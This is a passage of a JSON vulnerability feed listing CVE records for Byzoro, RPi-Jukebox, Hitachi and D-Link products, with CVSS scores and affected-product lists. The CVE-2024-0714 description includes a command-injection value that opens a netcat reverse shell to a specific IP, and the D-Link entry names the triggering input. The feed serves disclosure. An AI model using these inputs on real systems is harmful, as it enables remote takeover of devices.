"cpe:2.3:a:otwthemes:buttons_shortcode_and_widget:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.16", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-13T00:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0712", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md", "name" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md", "name" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251538", "name" : "VDB-251538 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251538", "name" : "VDB-251538 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251538", "name" : "VDB-251538 | Byzoro Smart S150 Management Platform userattea.php access control", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251538", "name" : "VDB-251538 | Byzoro Smart S150 Management Platform userattea.php access control", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.264497", "name" : "Submit #264497 | ???????????? Smart S150 S150 unauthorized", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.264497", "name" : "Submit #264497 | ???????????? Smart S150 S150 unauthorized", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Byzoro Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:byzoro:smart_s150_firmware:31r02b15:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:byzoro:smart_s150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0713", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2020-28871. Reason: This candidate is a reservation duplicate of CVE-2020-28871. Notes: All CVE users should reference CVE-2020-28871 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-19T14:15Z", "lastModifiedDate" : "2024-04-25T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0714", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.251540", "name" : "https://vuldb.com/?ctiid.251540", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251540", "name" : "https://vuldb.com/?ctiid.251540", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251540", "name" : "https://vuldb.com/?id.251540", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251540", "name" : "https://vuldb.com/?id.251540", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sourcefabric:phoniebox:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.5.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0715", "ASSIGNER" : "hirt@hitachi.co.jp" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-917" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html", "name" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html", "name" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Expression Language Injection vulnerability in Hitachi Global Link Manager on Windows allows Code Injection.This issue affects Hitachi Global Link Manager: before 8.8.7-03.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hitachi:global_link_manager:*:*:*:*:*:*:*:*", "versionEndExcluding" : "8.8.7-03", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-20T02:15Z", "lastModifiedDate" : "2025-02-12T17:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0716", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md", "name" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md", "name" : "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251541", "name" : "VDB-251541 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251541", "name" : "VDB-251541 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251541", "name" : "VDB-251541 | Byzoro Smart S150 Management Platform Backup File download.php information disclosure", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251541", "name" : "VDB-251541 | Byzoro Smart S150 Management Platform Backup File download.php information disclosure", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.265177", "name" : "Submit #265177 | ???????????? Smart S150 Smart V31R02B15 Download any file", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.265177", "name" : "Submit #265177 | ???????????? Smart S150 Smart V31R02B15 Download any file", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in Byzoro Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:byzoro:smart_s150_firmware:31r02b15:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:byzoro:smart_s150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.6, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0717", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/999zzzzz/D-Link", "name" : "https://github.com/999zzzzz/D-Link", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/999zzzzz/D-Link", "name" : "https://github.com/999zzzzz/D-Link", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251542", "name" : "https://vuldb.com/?ctiid.251542", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251542", "name" : "https://vuldb.com/?ctiid.251542", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251542", "name" : "https://vuldb.com/?id.251542", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251542", "name" : "https://vuldb.com/?id.251542", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-825acg1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-825acg1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-841_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-841:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-1260_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-1260:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-x1530_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-x1530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-825_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-825:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-615_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-842_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-842:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-853_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-853:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-1210_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-1210:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-806a_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-806a:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-815_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-815:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dsl-245gr_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dsl-245gr:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dsl-g2452gr_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dsl-g2452gr:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-878_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-878:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-825acf_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-825acf:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-615t_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-615t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-300_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-842s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-842s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-815s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-815s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dsl-2640u_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dsl-2640u:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-2150_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-2150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dwr-921_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dwr-921:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-615s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-615s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-620_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dvg-5402g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dvg-5402g:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-882_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-882:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dwm-312w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dwm-312w:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 